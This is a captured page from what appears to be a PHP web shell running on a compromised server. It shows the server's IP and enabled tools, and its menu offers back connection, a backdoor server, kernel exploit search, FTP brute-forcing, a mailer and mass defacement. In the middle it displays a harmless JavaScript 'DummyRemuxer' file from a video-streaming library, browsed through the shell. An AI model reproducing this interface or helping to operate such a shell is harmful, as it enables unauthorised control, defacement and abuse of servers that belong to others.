IP Address: 80.252.133.24:443 You: 216.73.216.193
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ http/ root/ hls/ src/ remux/ - drwxr-xr-x |
Viewing file:
Select action/file-type: /** * dummy remuxer */ class DummyRemuxer { constructor (observer) { this.observer = observer; } destroy () { } resetInitSegment () { } resetTimeStamp () { } remux (audioTrack, videoTrack, id3Track, textTrack, timeOffset) { this._remuxAACSamples(audioTrack, timeOffset); this._remuxAVCSamples(videoTrack, timeOffset); this._remuxID3Samples(id3Track, timeOffset); this._remuxTextSamples(textTrack, timeOffset); } _remuxAVCSamples (track, timeOffset) { let avcSample, unit; // loop through track.samples while (track.samples.length) { avcSample = track.samples.shift(); // loop through AVC sample NALUs while (avcSample.units.length) { unit = avcSample.units.shift(); } } // please lint timeOffset = timeOffset; } _remuxAACSamples (track, timeOffset) { let aacSample, unit; // loop through track.samples while (track.samples.length) { aacSample = track.samples.shift(); unit = aacSample.unit; } // please lint timeOffset = timeOffset; } _remuxID3Samples (track, timeOffset) { let id3Sample, unit; // loop through track.samples while (track.samples.length) { id3Sample = track.samples.shift(); unit = id3Sample.unit; } // please lint timeOffset = timeOffset; } _remuxTextSamples (track, timeOffset) { let textSample, bytes; // loop through track.samples while (track.samples.length) { textSample = track.samples.shift(); bytes = textSample.bytes; } // please lint timeOffset = timeOffset; } } export default DummyRemuxer; |
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ Ú |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |